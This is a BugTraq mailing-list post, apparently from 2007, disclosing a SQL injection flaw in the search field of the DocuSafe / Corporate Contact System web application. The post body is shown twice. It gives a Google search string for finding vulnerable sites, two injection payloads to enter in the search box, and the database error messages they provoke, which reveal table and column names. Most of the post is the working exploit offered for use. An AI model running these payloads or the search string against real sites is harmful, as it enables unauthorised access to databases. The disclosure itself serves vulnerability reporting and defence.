Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
DocuSafe "Search" SQL Injection
Nov 13 2007 11:28PM
No-Reply Aria-Security net
DocuSafe "Search" SQL Injection
Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System
insert your command in the section "search"
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
or
'group by tblMain.fldArtNr having 1=1--
result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
/includes/common.asp, line 62
Regards,
The-0utl4w
Credits Goes To Aria-Security.Net
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System
insert your command in the section "search"
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
or
'group by tblMain.fldArtNr having 1=1--
result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
/includes/common.asp, line 62
Regards,
The-0utl4w
Credits Goes To Aria-Security.Net
[ reply ]